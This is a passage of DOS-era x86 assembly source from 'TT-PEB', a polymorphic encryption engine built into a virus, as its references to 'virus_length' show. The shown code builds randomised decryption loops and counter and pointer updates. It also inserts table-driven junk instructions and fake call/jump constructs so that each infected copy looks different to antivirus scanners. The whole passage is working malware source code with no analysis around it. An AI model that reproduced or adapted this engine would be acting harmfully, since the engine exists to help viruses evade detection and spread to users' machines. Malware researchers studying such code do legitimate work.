; space for later assignment retn table_3: dw 03h ; bx dw 06h ; si dw 07h ; di cntr_crea: ; ; cntr_crea creates the inital assignment to the counter register. ; there are three ways to do so in tt-peb: ; 1) tbl4_a directly sets value via 16bit mov (mov cntr16,value) ; 2) tbl4_b first assigns the value to the low 8bits of the counter reg ; and then to the high 8bits ; 3) tbl4_c first assigns the value to the high 8bits, then to the low 8 ; between the low 8 and high 8 bit set there will be some garbage. ; of course the tbl4_b and tbl4_c can't be used by 16bits only regs (bp,di,si) ; ; call garb_rr1f ; get a rnd register cmp al,[pntr_reg] ; not same as pointer je cntr_crea mov byte ptr [cntr_reg],al mov dl,al cmp dl,5 ; bp 16only je tbl4_a cmp dl,6 ; si 16only je tbl4_a cmp dl,7 ; di 16only je tbl4_a mov ax,3 mov bx,offset table_4 ; for others randomly call tbl2addr ; select the method jmp ax table_4: dw offset tbl4_a dw offset tbl4_b dw offset tbl4_c tbl4_a: mov al,dl or al,0b8h stosb call get_random mov ah,00h mov cx,ax mov ax,virus_length cmp byte ptr [poly_in_mem],0 je loca_1 add ax,cx loca_1: stosw retn tbl4_b: mov al,dl or al,0b0h stosb call get_random mov ah,00h mov cx,ax mov ax,virus_length cmp byte ptr [poly_in_mem],0 je loc_79 add ax,cx loc_79: stosb push ax push dx mov al,7 call garbager pop dx mov al,dl or al,0B4h stosb pop ax mov al,ah stosb retn tbl4_c: mov al,dl or al,0B4h stosb call get_random mov ah,0 mov cx,ax mov ax,virus_length cmp byte ptr [poly_in_mem],0 je loc_80 add ax,cx loc_80: xchg al,ah stosb push ax push dx mov al,7 call garbager pop dx mov al,dl or al,0B0h stosb pop ax mov al,ah stosb retn loc_81: call garb_rr14 mov byte ptr [oper_reg],al or al,0B0h stosb call store_rnd_no0 retn math_oper: ; ; math_oper creates the code that encrypts/decrypts data in memory ; mov [mathpos],di mov ax,[tt_saved_ax] and ax,1 ; need to force CS: ? cmp ax,0 je loc_82 mov al,2Eh ; force CS: stosb jmp short loc_83 loc_82: call garb_rr30 loc_83: mov ax,3 mov bx,offset table_5 ; select enc/dec type call tbl2addr mov dx,ax mov [math_oc],dh ; store the inverse cmp byte ptr [pntr_reg],3 jne loc_84 mov dh,7 loc_84: cmp byte ptr [pntr_reg],6 jne loc_85 mov dh,4 loc_85: cmp byte ptr [pntr_reg],7 jne loc_85a mov dh,5 loc_85a: mov ax,2 mov bx,offset table_6 call tbl2addr jmp ax table_6: ; ; the generated math operation should be: ; 1) tbl6_a: math operation using the value from the operation reg ; 2) tbl6_b: math operation using an immediate ; dw offset tbl6_a dw offset tbl6_b tbl6_a: mov [mate_pos],di mov al,dl stosb mov al,byte ptr [oper_reg] shl al,3 or al,dh stosb retn tbl6_b: mov byte ptr [oper_reg],0ffh ; can use the oper_reg or [math_oc],dh mov al,80h stosb mov [mate_pos],di mov al,dh or al,dl stosb call garb_rr07 retn table_5: ; ENC,DEC db 30h,30h ; xor/xor db 28h,00h ; add/sub db 00h,28h ; sub/add pntr_update: ; ; pntr_update creates the code to update the pointer on encrypted code ; there are 5 ways in which the poly does this: ; 1) tbl7_a: inc pnt_reg ; 2) tbl7_b: add pnt_reg,1 (adding 1 as a byte) ; 3) tbl7_c: add pnt_reg,1 (adding 1 as a word) ; 4) tbl7_d: sub pnt_reg,-1 (subbing -1 as a byte) ; 5) tbl7_e: sub pnt_reg,-1 (subbing -1 as a word) ; mov byte ptr [pntr_chdone],0 mov ax,5 mov bx,offset table_7 call tbl2addr jmp ax table_7: dw offset tbl7_a dw offset tbl7_b dw offset tbl7_c dw offset tbl7_d dw offset tbl7_e tbl7_a: mov al,[pntr_reg] or al,40h stosb retn tbl7_b: mov al,83h stosb mov al,byte ptr [pntr_reg] or al,0c0h stosb mov al,01h stosb retn tbl7_c: mov al,81h stosb mov al,byte ptr [pntr_reg] or al,0c0h stosb mov ax,01h stosw retn tbl7_d: mov al,83h stosb mov al,byte ptr [pntr_reg] or al,0e8h stosb mov al,0ffh stosb retn tbl7_e: mov al,81h stosb mov al,byte ptr [pntr_reg] or al,0e8h stosb mov ax,0ffffh stosw retn cntr_update: ; ; cntr_update creates the code to update the counter in the decryption loop ; there are 5 ways to do so in ttpeb: ; 1) tbl8_a: dec cnt_reg ; 2) tbl8_b: sub cnt_reg,1 (subbing 1 as a byte) ; 3) tbl8_c: sub cnt_reg,1 (subbing 1 as a word) ; 4) tbl8_d: add cnt_reg,-1 (adding -1 as a byte) ; 5) tbl8_e: add cnt_reg,-1 (adding -1 as a word) ; mov byte ptr [cntr_chdone],0 mov ax,5 mov bx,offset table_8 call tbl2addr jmp ax table_8: dw offset tbl8_a dw offset tbl8_b dw offset tbl8_c dw offset tbl8_d dw offset tbl8_e tbl8_a: mov al,byte ptr [cntr_reg] or al,48h stosb retn tbl8_b: mov al,83h stosb mov al,byte ptr [cntr_reg] or al,0E8h stosb mov al,1 stosb retn tbl8_c: mov al,81h stosb mov al,byte ptr [cntr_reg] or al,0E8h stosb mov ax,1 stosw retn tbl8_d: mov al,83h stosb mov al,byte ptr [cntr_reg] or al,0C0h stosb mov al,0FFh stosb retn tbl8_e: mov al,81h stosb mov al,byte ptr [cntr_reg] or al,0C0h stosb mov ax,0FFFFh stosw retn check_counter: ; ; check_counter creates the code to check if the counter is 0 so the loop ; has to finish ; there are 3 ways to do this: ; 1) tbl9_a: cmp cnt_reg,0 (using 0 as a byte) ; 2) tbl9_b: cmp cnt_reg,0 (using 0 as a word) ; 3) tbl9_c: or cnt_reg,cnt_reg mov ax,3 mov bx,offset table_9 call tbl2addr jmp ax table_9: dw offset tbl9_a dw offset tbl9_b dw offset tbl9_c tbl9_a: mov al,83h stosb mov al,byte ptr [cntr_reg] or al,0f8h stosb mov al,00h stosb retn tbl9_b: mov al,81h stosb mov al,byte ptr [cntr_reg] or al,0f8h stosb mov ax,00h stosw retn tbl9_c: mov al,09h stosb mov al,byte ptr [cntr_reg] shl al,3 or al,byte ptr [cntr_reg] or al,0c0h stosb retn make_cond_jump: ; ; make_cond_jump creates the conditional jump after the comparation of the ; counter register. the conditional jump will jump a few garbage instructions ; (generated in this routine) and the main jump to the start of the decryption ; loop (generated later in the jump_back routine). ; mov al,74h ; jump zero stosb add di,1 push di mov byte ptr [spec_cnst],0 mov al,7 call garbager mov byte ptr [spec_cnst],0FFh pop bx mov ax,di sub ax,bx add ax,3 ; 3 bytes for the jump_back mov es:[bx-1],al ; set the offset to jump retn ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; Creates the JMP back to the start of the decryption loop jump_back: mov bx,di mov al,0e9h ; jmp opcode stosb mov ax,[dec_loop_start] sub bx,ax mov ax,bx add ax,3 neg ax stosw ; back offset retn ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; Get the number of random instructions to generate depending on given ; option to TT-PEB in AX garb_cntr: mov ax,word ptr [tt_saved_ax] and ax,2 cmp ax,0 je gb_exit1 mov al,3fh jmp short garbager gb_exit1: retn ; Create some garbage instructions. Needs AL as a mask to limit max rnd ; instruction number garbager: mov cl,al call get_random and al,cl mov ah,0 mov cx,ax jmp short garb_loop1 sub_37: mov cl,al call random_no0 and al,cl mov ah,0 mov cx,ax jmp short garb_loop1 ; CX = number of garbage instructions to create garb_loop1: cmp cx,0 je garb_loop1_end push cx call sub_38 pop cx sub cx,1 jmp short garb_loop1 garb_loop1_end: retn sub_38: push ds mov ax,es sub ax,40h mov ds,ax mov ax,ds:[0] mov bx,2 call tbl2addr pop ds cmp ax,8000h ; if >=8000h then a special ; construct has been choosen jae loc_92 mov si,ax call garb_compiler retn loc_92: cmp byte ptr [spec_cnst],0 ; creation possible? 0=NO je loc_ret_93 sub ax,8000h ; correct adress call ax loc_ret_93: retn garb_compiler: cmp byte ptr [si],0ffh ; end of garbage line? je loc_ret_97 mov ah,[si] ; get "command" to do add si,1 push si mov si,offset garb_routines loc_95: cmp [si],ah je loc_96 ; search the appropriate add si,3 ; command jmp short loc_95 loc_96: mov bx,[si+1] ; adress in BX pop si call bx ; build garbage jmp short garb_compiler loc_ret_97: retn tbl2addr: ; given as input the adress of a table (in DS:BX) and the number of elements ; in the table (in AX) this routine will return (in AX) the value of a random ; element of the table. this is expecially used to get the adress of a garbage ; or instruction generation routine from the engine tables push bx push cx push dx mov cx,ax call random_in_ax ; rnd in ax loc_98: cmp ax,cx jb loc_99 sub ax,cx ; sub until a good (< than max) jmp short loc_98 ; nr is choosen loc_99: add ax,ax ; each addr is 1 word long add bx,ax ; + base of table mov ax,[bx] ; get the value pop dx pop cx pop bx retn ; Table with reference to garbage creation routines garb_routines: db 00h dw offset garb_rr00 db 01h dw offset garb_rr01 db 02h dw offset garb_rr02 db 03h dw offset garb_rr03 db 04h dw offset garb_rr04 db 05h dw offset garb_rr05 db 06h dw offset garb_rr06 db 07h dw offset garb_rr07 db 08h dw offset garb_rr08 db 09h dw offset garb_rr09 db 0ah dw offset garb_rr0a db 0bh dw offset garb_rr0b db 0ch dw offset garb_rr0c db 0dh dw offset garb_rr0d db 0eh dw offset garb_rr0e db 0fh dw offset garb_rr0f db 10h dw offset garb_rr10 db 11h dw offset garb_rr11 db 12h dw offset garb_rr12 db 13h dw offset garb_rr13 db 14h dw offset garb_rr14 db 15h dw offset garb_rr15 db 16h dw offset garb_rr16 db 17h dw offset garb_rr17 db 18h dw offset garb_rr18 db 19h dw offset garb_rr19 db 1ah dw offset garb_rr1a db 1bh dw offset garb_rr1b db 1ch dw offset garb_rr1c db 1dh dw offset garb_rr1d db 1eh dw offset garb_rr1e db 1fh dw offset garb_rr1f db 20h dw offset garb_rr20 db 21h dw offset garb_rr21 db 22h dw offset garb_rr22 db 23h dw offset garb_rr23 db 24h dw offset garb_rr24 db 25h dw offset garb_rr25 db 26h dw offset garb_rr26 db 27h dw offset garb_rr27 db 28h dw offset garb_rr28 db 29h dw offset garb_rr29 db 2ah dw offset garb_rr2a db 2bh dw offset garb_rr2b db 2ch dw offset garb_rr2c db 2dh dw offset garb_rr2d db 2eh dw offset garb_rr2e db 2fh dw offset garb_rr2f db 30h dw offset garb_rr30 db 31h dw offset garb_rr31 db 32h dw offset garb_rr32 garb_rr00: movsb retn garb_rr01: push cx mov ch,0 mov cl,[si] add si,1 rep movsb pop cx retn garb_rr02: lodsb ; String [si] to al retn garb_rr03: stosb ; Store al to es:[di] retn garb_rr04: get_random: ; output random byte in AL mov byte ptr cs:[tmp_store_ah],ah ; cmp word ptr cs:[rnd_pos],0FFh ; first random? db 2Eh,83h,3Eh,64h,0Dh,0FFh jnz first_random in al,40h ; port 40h, 8253 timer 0 clock mov ah,al mov al,0 mov word ptr cs:[rnd_pos],ax first_random: push si push ds mov ax,0F000h mov ds,ax mov si,word ptr cs:[rnd_pos] look_randy: mov al,byte ptr [si] cmp al,byte ptr [si+1] jne ok_randy cmp al,byte ptr [si+2] jne ok_randy cmp al,byte ptr [si+3] jne ok_randy add si,1 jmp short look_randy ok_randy: add si,1 mov word ptr cs:[rnd_pos],si pop ds pop si mov ah,byte ptr cs:[tmp_store_ah] retn rnd_pos dw 98e3h garb_rr05: call get_random stosb ; Store al to es:[di] retn garb_rr06: random_no0: call get_random cmp al,0 je random_no0 retn garb_rr07: store_rnd_no0: call random_no0 stosb ; Store al to es:[di] retn garb_rr08: random_noff: call get_random cmp al,0FFh je random_noff retn garb_rr09: call random_noff stosb ; Store al to es:[di] retn random_in_ax: call get_random mov ah,al call get_random retn garb_rr0a: and al,[si] add si,1 stosb ; Store al to es:[di] retn garb_rr0b: or al,[si] add si,1 stosb ; Store al to es:[di] retn garb_rr0c: and al,[si] add si,1 or al,[si] add si,1 stosb ; Store al to es:[di] retn garb_rr0d: mov cl,[si] add si,1 shr al,cl retn garb_rr0e: mov cl,[si] add si,1 shl al,cl retn garb_rr0f: cmp byte ptr [some_lock],0 jne loc_106 ; Jump if not equal mov byte ptr [some_lock],0FFh call garb_rr19 mov byte ptr [some_lock],0 retn loc_106: call get_random and al,7 retn sub_47: call garb_rr0f mov ah,al shl ah,3 retn garb_rr10: call sub_47 call garb_rr0f or al,ah retn garb_rr11: call sub_49 call garb_rr0f or al,ah retn garb_rr12: call sub_51 call garb_rr0f or al,ah retn garb_rr13: call sub_47 call garb_rr1e or al,ah retn garb_rr14: cmp byte ptr [some_lock],0 jne loc_107 ; Jump if not equal mov byte ptr [some_lock],0FFh call garb_rr19 mov byte ptr [some_lock],0 retn loc_107: mov byte ptr ds:[tmp_store_ah],ah loc_108: mov ah,byte ptr ds:[tmp_store_ah] call garb_rr0f mov byte ptr ds:[tmp_store_ah],ah mov ah,al and ah,3 cmp [pntr_reg],ah je loc_108 ; Jump if equal cmp byte ptr [cntr_reg],ah je loc_108 ; Jump if equal mov ah,byte ptr ds:[tmp_store_ah] retn sub_49: call garb_rr14 mov ah,al shl ah,3 retn garb_rr15: call sub_47 call garb_rr14 or al,ah retn garb_rr16: call sub_49 call garb_rr14 or al,ah retn garb_rr17: call sub_51 call garb_rr14 or al,ah retn garb_rr18: call sub_49 call garb_rr1e or al,ah retn garb_rr19: call garb_rr14 cmp byte ptr [oper_reg],al je garb_rr19 retn sub_51: call garb_rr19 mov ah,al shl ah,3 retn garb_rr1a: call sub_47 call garb_rr19 or al,ah retn garb_rr1b: call sub_49 call garb_rr19 or al,ah retn garb_rr1c: call sub_51 call garb_rr19 or al,ah retn garb_rr1d: call sub_51 call garb_rr1e or al,ah retn garb_rr1e: call get_random and al,7 cmp al,6 je garb_rr1e retn garb_rr1f: cmp byte ptr [some_lock],0 jne loc_112 ; Jump if not equal mov byte ptr [some_lock],0FFh call garb_rr29 mov byte ptr [some_lock],0 retn loc_112: call get_random and al,7 cmp al,4 je garb_rr1f retn sub_54: call garb_rr1f mov ah,al shl ah,3 ; Shift w/zeros fill retn garb_rr20: call sub_54 call garb_rr1f or al,ah retn garb_rr21: call sub_56 call garb_rr1f or al,ah retn garb_rr22: call sub_58 call garb_rr1f or al,ah retn garb_rr23: call sub_54 call garb_rr1e or al,ah retn garb_rr24: cmp byte ptr [some_lock],0 jne loc_114 ; Jump if not equal mov byte ptr [some_lock],0FFh call garb_rr29 mov byte ptr [some_lock],0 retn loc_114: call garb_rr1f cmp [pntr_reg],al je garb_rr24 cmp byte ptr [cntr_reg],al je garb_rr24 retn sub_56: call garb_rr24 mov ah,al shl ah,3 retn garb_rr25: call sub_54 call garb_rr24 or al,ah retn garb_rr26: call sub_56 call garb_rr24 or al,ah retn garb_rr27: call sub_58 call garb_rr24 or al,ah retn garb_rr28: call sub_56 call garb_rr1e or al,ah retn garb_rr29: mov byte ptr ds:[tmp_store_ah],ah loc_115: mov ah,byte ptr ds:[tmp_store_ah] call garb_rr24 mov byte ptr ds:[tmp_store_ah],ah mov ah,byte ptr [oper_reg] and ah,0FBh cmp al,ah je loc_115 ; Jump if equal mov ah,byte ptr ds:[tmp_store_ah] retn sub_58: call garb_rr29 mov ah,al shl ah,3 ; Shift w/zeros fill retn garb_rr2a: call sub_54 call garb_rr29 or al,ah retn garb_rr2b: call sub_56 call garb_rr29 or al,ah retn garb_rr2c: call sub_58 call garb_rr29 or al,ah retn garb_rr2d: call sub_58 call garb_rr1e or al,ah retn garb_rr2e: mov al,[si] add si,1 mov ah,al and ah,3 cmp [pntr_reg],ah je loc_ret_116 cmp byte ptr [cntr_reg],ah je loc_ret_116 cmp byte ptr [oper_reg],al je loc_ret_116 add si,1 loc_ret_116: retn garb_rr2f: mov al,[si] add si,1 cmp [pntr_reg],al je loc_ret_117 cmp byte ptr [cntr_reg],al je loc_ret_117 mov ah,byte ptr [oper_reg] and ah,0FBh cmp al,ah je loc_ret_117 add si,1 loc_ret_117: retn garb_rr30: call get_random and al,3 cmp al,0 jne loc_ret_119 ; Jump if not equal call get_random and al,18h cmp al,10h je garb_rr30 or al,26h stosb loc_ret_119: retn garb_rr31: cmp byte ptr [decr_init],0 je loc_ret_120 cmp byte ptr [cntr_reg],1 je loc_ret_120 cmp byte ptr [oper_reg],1 je loc_ret_120 cmp byte ptr [oper_reg],5 je loc_ret_120 mov al,byte ptr [oper_reg] and al,0FBh cmp al,1 je loc_ret_120 call get_random and al,3 cmp al,0 jne loc_ret_120 call get_random and al,1 or al,0F2h stosb loc_ret_120: retn garb_rr32: cmp byte ptr [decr_init],0 je loc_ret_121 add si,1 loc_ret_121: retn tmp_store_ah db 29h ; tmp space to store AH db 00h db 00h ; this table contains the offsets to the garbage constructs. ; the first few (that create more complicated constructs like calls) have ; a fixed added value of 8000h, so the main generation routine will see if ; one of them has been choosen. this is done to make the detection of such ; constructs faster. infact this kind of constructs can't be always done ; (the poly doesn't generate a call construct in another call construct and ; such like things) of course the offsets will be corrected later. garbage_offsets: dw offset garb_cf0 + 8000h dw offset garb_cf1 + 8000h dw offset garb_cf2 + 8000h dw offset garb_cf3 + 8000h dw offset garb_cf4 + 8000h dw offset garb_cf5 + 8000h dw offset garb_c00 dw offset garb_c01 dw offset garb_c02 dw offset garb_c03 dw offset garb_c04 dw offset garb_c05 dw offset garb_c06 dw offset garb_c07 dw offset garb_c08 dw offset garb_c0a dw offset garb_c0c dw offset garb_c0d dw offset garb_c0f dw offset garb_c11 dw offset garb_c13 dw offset garb_c15 dw offset garb_c18 dw offset garb_c1c dw offset garb_c1e dw offset garb_c20 dw offset garb_c22 dw offset garb_c24 dw offset garb_c27 dw offset garb_c29 dw offset garb_c2a dw offset garb_c2b dw offset garb_c2c dw offset garb_c2d dw offset garb_c2e dw offset garb_c2f dw offset garb_c30 dw offset garb_c31 dw offset garb_c32 dw offset garb_c33 dw offset garb_c34 dw offset garb_c35 dw offset garb_c36 dw offset garb_c37 dw offset garb_c38 dw offset garb_c39 dw offset garb_c3a dw offset garb_c3b dw offset garb_c3c dw offset garb_c3d dw offset garb_c3e dw offset garb_c3f dw offset garb_c40 dw offset garb_c41 dw offset garb_c42 dw offset garb_c43 dw offset garb_c44 dw offset garb_c45 dw offset garb_c46 dw offset garb_c47 dw offset garb_c48 dw offset garb_c49 dw offset garb_c4a dw offset garb_c4b dw offset garb_c4c dw offset garb_c4d dw offset garb_c4e dw offset garb_c4f dw offset garb_c50 dw offset garb_c51 dw offset garb_c52 dw offset garb_c53 dw offset garb_c54 dw offset garb_c55 dw offset garb_c56 dw offset garb_c57 dw offset garb_c58 dw offset garb_c59 dw offset garb_c5a dw offset garb_c5b dw offset garb_c5c dw offset garb_c5d dw offset garb_c5e dw offset garb_c5f dw offset garb_c60 dw offset garb_c61 dw offset garb_c62 dw offset garb_c63 dw offset garb_c64 dw offset garb_c65 dw offset garb_c66 dw offset garb_c67 dw offset garb_c68 dw offset garb_c69 dw offset garb_c6a dw offset garb_c6b dw offset garb_c6c dw offset garb_c6d dw offset garb_c6e dw offset garb_c6f dw offset garb_c70 dw offset garb_c71 dw offset garb_c72 dw offset garb_c73 dw offset garb_c74 dw offset garb_c75 dw offset garb_c76 dw offset garb_c77 dw offset garb_c78 dw offset garb_c79 dw offset garb_c7a dw offset garb_c7b dw offset garb_c7c dw offset garb_c7d dw offset garb_c7e dw offset garb_c7f dw offset garb_c80 dw offset garb_c81 dw offset garb_c82 dw offset garb_c83 dw offset garb_c84 dw offset garb_c9c dw offset garb_c85 dw offset garb_c86 dw offset garb_c87 dw offset garb_c28 dw offset garb_c88 dw offset garb_c89 dw offset garb_c8a dw offset garb_c8b dw offset garb_c8c dw offset garb_c8d dw offset garb_c8e dw offset garb_c8f dw offset garb_c90 dw offset garb_c91 dw offset garb_c92 dw offset garb_c93 dw offset garb_c94 dw offset garb_c95 dw offset garb_c96 dw offset garb_c97 dw offset garb_c98 dw offset garb_c99 dw offset garb_c9a dw offset garb_c9b dw offset garb_c26 dw offset garb_c9d dw offset garb_c9e dw offset garb_c9f dw offset garb_ca0 dw offset garb_ca1 dw offset garb_ca2 dw offset garb_ca3 dw offset garb_ca4 dw offset garb_ca5 dw offset garb_ca6 dw offset garb_ca7 dw offset garb_ca8 dw offset garb_ca9 dw offset garb_caa dw offset garb_cab dw offset garb_cac dw offset garb_cad dw offset garb_cae dw offset garb_caf dw offset garb_c25 dw offset garb_cb0 dw offset garb_cb1 dw offset garb_cb2 dw offset garb_cb3 dw offset garb_cb4 dw offset garb_cb5 dw offset garb_cb6 dw offset garb_cb7 dw offset garb_cb8 dw offset garb_cb9 dw offset garb_cbc dw offset garb_cbd dw offset garb_cbe dw offset garb_cbe dw offset garb_cbf dw offset garb_cbf dw offset garb_cc0 dw offset garb_cc0 dw offset garb_cc1 dw offset garb_cc1 dw offset garb_cc2 dw offset garb_cc2 dw offset garb_cc3 dw offset garb_cc3 dw offset garb_cc4 dw offset garb_cc4 dw offset garb_cc5 dw offset garb_cc5 dw offset garb_cc6 dw offset garb_cc6 dw offset garb_cc7 dw offset garb_cc7 dw offset garb_cc8 dw offset garb_cc8 dw offset garb_cc9 dw offset garb_cc9 dw 00h ; end marker ; End of table with garbage constructs offsets garb_cf0: ; ; looks like ; jmp short foo1 ; _rndnr ; foo1: ; mov al,0ebh ; jmp short stosb loc_122: call get_random and ax,7 cmp al,0 je loc_122 stosb ; store the offset mov cx,ax locloop_123: call get_random stosb ; fill with random data loop locloop_123 retn garb_cf1: ; ; looks like ; jmpc foo1 ; _garbage ; foo1: ; mov al,[spec_cnst] mov byte ptr [spec_cnst],0 ; lock generation of spec push ax mov al,[some_lock] mov byte ptr [some_lock],0 push ax loc_124: call get_random and al,0Fh cmp al,2 jb loc_124 cmp al,7 ja loc_124 or al,70h stosb ; do some sort of conditional ; jump add di,1 push di mov al,0Fh call sub_37 pop bx mov ax,di sub ax,bx mov es:[bx-1],al ; cnd jump offset pop ax mov [some_lock],al pop ax mov [spec_cnst],al retn garb_cf2: ; ; looks like ; jcxz foo1 ; _garbage ; foo1: ; mov al,[spec_cnst] mov byte ptr [spec_cnst],0 push ax mov al,[some_lock] mov byte ptr [some_lock],0 push ax mov al,0e3h ; jcxz opcode stosb add di,1 push di mov al,0Fh call sub_37 pop bx mov ax,di sub ax,bx mov es:[bx-1],al ; jcxz jump offset pop ax mov [some_lock],al pop ax mov [spec_cnst],al retn garb_cf3: ; ; looks like: ; call foo1 ; _garbage ; jmp a_foo1 ; foo1: ; _garbage ; ret ; _rndnr ; a_foo1: ; mov al,[spec_cnst] mov byte ptr [spec_cnst],0 push ax call get_random mov al,0e8h ; call opcode stosb add di,2 push di mov al,3 call garbager mov al,0ebh ; jmp short opcode stosb add di,1 pop bx push di mov ax,di sub ax,bx mov es:[bx-2],ax ; adress to be call-ed mov al,7 call sub_37 ; garbage mov al,0C3h ; ret opcode stosb call get_random and ax,7 cmp ax,0 je loc_126 mov cx,ax locloop_125: call get_random stosb loop locloop_125 loc_126: pop bx mov ax,di sub ax,bx mov es:[bx-1],al ; adress for the jmp short ; after the call-ed ; "subroutine" pop ax mov [spec_cnst],al retn garb_cf4: ; ; looks like ; push cs ; call foo1 ; _garbage ; jmp a_foo1 ; foo1: ; _garbage ; retf ; _rndnr ; a_foo1: ; mov al,[spec_cnst] mov byte ptr [spec_cnst],0 push ax mov al,0eh ; push cs opcode stosb mov al,7 call garbager mov al,0e8h ; call opcode stosb add di,2 push di mov al,3 call garbager mov al,0ebh ; jmp that will jump the stosb ; call-ed subroutine add di,1 pop bx push di mov ax,di sub ax,bx mov es:[bx-2],ax ; adress for the call mov al,7 call sub_37 ; garbage mov al,0cbh ; retf opcode stosb call get_random and ax,7 cmp ax,0 je loc_128 mov cx,ax locloop_127: call get_random stosb loop locloop_127 loc_128: pop bx mov ax,di sub ax,bx mov es:[bx-1],al ; the offset for the jmp pop ax mov [spec_cnst],al retn garb_cf5: ; ; looks like ; push reg_x ; _garbage ; pop reg_x ; call garb_rr1f push ax or al,50h ; push base opcode stosb mov al,0Fh call sub_37 pop ax or al,58h ; pop base opcode stosb retn ; Garbage instruction construction table ; Every entry in this table is used to create some kind of garbage. The dbs ; are interpreted byte by byte by a TT-PEB routine. There is some sorta ; "compiler" of garbage in TT-PEB. More in the poly description :-) garb_c00 db 000h,090h,0ffh garb_c01 db 000h,0fbh,0ffh garb_c02 db 000h,0fah,0ffh garb_c03 db 000h,0f9h,0ffh garb_c04 db 000h,0f8h,0ffh garb_c05 db 000h,0fdh,0ffh garb_c06 db 000h,0fch,0ffh garb_c07 db 000h,0f5h,0ffh garb_c08 db 02eh,000h,0ffh,000h,02fh,0ffh garb_c0a db 02eh,004h,0ffh,000h,09fh,0ffh garb_c0c db 000h,09eh,0ffh garb_c0d db 02fh,000h,0ffh,000h,037h,0ffh garb_c0f db 02fh,000h,0ffh,000h,03fh,0ffh garb_c11 db 02fh,000h,0ffh,001h,002h,0d4h,00ah,0ffh garb_c13 db 02fh,000h,0ffh,001h,002h,0d5h,00ah,0ffh garb_c15 db 02eh,000h,0ffh,02fh,006h,0ffh,031h,000h,0ach,0ffh garb_c18 db 02eh,000h,0ffh,02fh,006h,0ffh,02fh,007h,0ffh,031h db 000h,0a6h,0ffh garb_c1c db 02fh,007h,0ffh,031h,000h,0aeh,0ffh garb_c1e db 02eh,000h,0ffh,000h,0d7h,0ffh garb_c20 db 02eh,004h,0ffh,000h,098h,0ffh garb_c22 db 02fh,002h,0ffh,000h,099h,0ffh garb_c24 db 032h,0ffh,02fh,001h,0ffh,004h,00ch,002h,0e0h,000h db 0feh,0ffh garb_c27 db 02fh,000h,0ffh,029h,00bh,090h,0ffh garb_c29 db 01fh,00bh,050h,029h,00bh,058h,0ffh garb_c2a db 004h,00ch,018h,006h,029h,00bh,058h,0ffh garb_c2b db 014h,00bh,0b0h,005h,0ffh garb_c2c db 000h,080h,014h,00bh,0c0h,005h,0ffh garb_c2d db 000h,080h,019h,00bh,0d0h,005h,0ffh garb_c2e db 000h,080h,014h,00bh,0e8h,005h,0ffh garb_c2f db 000h,080h,019h,00bh,0d8h,005h,0ffh garb_c30 db 000h,080h,00fh,00bh,0f8h,005h,0ffh garb_c31 db 000h,080h,014h,00bh,0f0h,005h,0ffh garb_c32 db 000h,080h,014h,00bh,0e0h,005h,0ffh garb_c33 db 000h,080h,014h,00bh,0c8h,005h,0ffh garb_c34 db 000h,082h,014h,00bh,0c0h,005h,0ffh garb_c35 db 000h,082h,019h,00bh,0d0h,005h,0ffh garb_c36 db 000h,082h,014h,00bh,0e8h,005h,0ffh garb_c37 db 000h,082h,019h,00bh,0d8h,005h,0ffh garb_c38 db 000h,082h,00fh,00bh,0f8h,005h,0ffh garb_c39 db 000h,082h,014h,00bh,0f0h,005h,0ffh garb_c3a db 000h,082h,014h,00bh,0e0h,005h,0ffh garb_c3b db 000h,082h,014h,00bh,0c8h,005h,0ffh garb_c3c db 000h,088h,01ah,00bh,0c0h,0ffh garb_c3d db 000h,000h,01ah,00bh,0c0h,0ffh garb_c3e db 000h,010h,01ah,00bh,0c0h,0ffh garb_c3f db 000h,028h,01ah,00bh,0c0h,0ffh garb_c40 db 000h,018h,01ah,00bh,0c0h,0ffh garb_c41 db 000h,038h,01ah,00bh,0c0h,0ffh garb_c42 db 000h,030h,01ah,00bh,0c0h,0ffh garb_c43 db 000h,020h,01ah,00bh,0c0h,0ffh garb_c44 db 000h,008h,01ah,00bh,0c0h,0ffh garb_c45 db 000h,08ah,012h,00bh,0c0h,0ffh garb_c46 db 000h,002h,012h,00bh,0c0h,0ffh garb_c47 db 000h,012h,012h,00bh,0c0h,0ffh garb_c48 db 000h,02ah,012h,00bh,0c0h,0ffh garb_c49 db 000h,01ah,012h,00bh,0c0h,0ffh garb_c4a db 000h,03ah,012h,00bh,0c0h,0ffh garb_c4b db 000h,032h,012h,00bh,0c0h,0ffh garb_c4c db 000h,022h,012h,00bh,0c0h,0ffh garb_c4d db 000h,00ah,012h,00bh,0c0h,0ffh garb_c4e db 000h,086h,01ch,00bh,0c0h,0ffh garb_c4f db 000h,0feh,014h,00bh,0c0h,0ffh garb_c50 db 000h,0feh,014h,00bh,0c8h,0ffh garb_c51 db 000h,0f6h,00fh,00bh,0c0h,005h,0ffh garb_c52 db 000h,084h,010h,00bh,0c0h,0ffh garb_c53 db 000h,084h,00fh,00eh,003h,00bh,006h,005h,005h,0ffh garb_c54 db 000h,084h,013h,003h,0ffh garb_c55 db 000h,0f6h,014h,00bh,0d0h,0ffh garb_c56 db 000h,0f6h,014h,00bh,0d8h,0ffh garb_c57 db 000h,0d0h,019h,00bh,0c8h,0ffh garb_c58 db 000h,0d0h,019h,00bh,0c0h,0ffh garb_c59 db 000h,0d0h,019h,00bh,0e8h,0ffh garb_c5a db 000h,0d0h,019h,00bh,0e0h,0ffh garb_c5b db 000h,0d0h,019h,00bh,0f8h,0ffh garb_c5c db 000h,0d0h,019h,00bh,0d0h,0ffh garb_c5d db 000h,0d0h,019h,00bh,0d8h,0ffh garb_c5e db 000h,0d2h,019h,00bh,0c8h,0ffh garb_c5f db 000h,0d2h,019h,00bh,0c0h,0ffh garb_c60 db 000h,0d2h,019h,00bh,0e8h,0ffh garb_c61 db 000h,0d2h,019h,00bh,0e0h,0ffh garb_c62 db 000h,0d2h,019h,00bh,0f8h,0ffh garb_c63 db 000h,0d2h,019h,00bh,0d0h,0ffh garb_c64 db 000h,0d2h,019h,00bh,0d8h,0ffh garb_c65 db 030h,000h,08ah,019h,00eh,003h,00bh,006h,005h,005h,0ffh garb_c66 db 030h,000h,002h,019h,00eh,003h,00bh,006h,005h,005h,0ffh garb_c67 db 030h,000h,012h,019h,00eh,003h,00bh,006h,005h,005h,0ffh garb_c68 db 030h,000h,02ah,019h,00eh,003h,00bh,006h,005h,005h,0ffh garb_c69 db 